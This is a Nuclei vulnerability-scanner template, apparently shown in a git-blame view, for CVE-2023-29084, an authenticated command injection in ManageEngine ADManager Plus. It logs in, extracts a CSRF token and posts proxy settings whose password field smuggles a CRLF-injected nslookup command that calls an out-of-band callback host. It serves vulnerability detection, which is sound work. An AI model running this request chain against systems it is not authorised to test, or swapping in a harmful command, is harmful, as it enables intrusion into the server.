nuclei-templates/http/cves/2023/CVE-2023-29084.yaml

81 lines
2.8 KiB
YAML
Raw Normal View History

2023-04-18 10:03:47 +00:00
id: CVE-2023-29084
2023-04-20 18:51:53 +00:00
2023-04-18 10:03:47 +00:00
info:
name: ManageEngine ADManager Plus - Command Injection
author: rootxharsh,iamnoooob,pdresearch
severity: high
2023-04-20 18:51:53 +00:00
description: |
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
2023-04-20 18:51:53 +00:00
reference:
2023-04-18 10:03:47 +00:00
- https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
- https://community.grafana.com/t/release-notes-v6-3-x/19202
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
- https://manageengine.com
- https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2023-29084
cwe-id: CWE-77
epss-score: 0.35624
epss-percentile: 0.96674
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
metadata:
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: zohocorp
product: manageengine_admanager_plus
2023-07-15 16:29:17 +00:00
tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated
2023-04-18 10:03:47 +00:00
variables:
cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"
http:
2023-04-18 10:03:47 +00:00
- raw:
- |
POST /j_security_check HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
- |
GET /home.do HTTP/1.1
Host: {{Hostname}}
- |
POST /api/json/admin/saveServerSettings HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{BaseURL}}
Referer: {{BaseURL}}
params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}
cookie-reuse: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"message":"'
- 'Proxy Settings'
condition: and
- type: word
part: interactsh_protocol
words:
- "dns"
extractors:
- type: kval
name: admpcsrf
2023-07-11 19:49:27 +00:00
internal: true
2023-04-18 10:03:47 +00:00
kval:
- admpcsrf
2023-07-11 19:49:27 +00:00
part: header
# digest: 490a0046304402200786974e2d1e81fe3880f9c58052d22e5b41a279560adba7eb5761a30d318e8602207b3434b6f37400375d4bddef16b44f2edb31ac42969c845ef3a568a96ea798a6:922c64590222798bb761d5b6d8e72950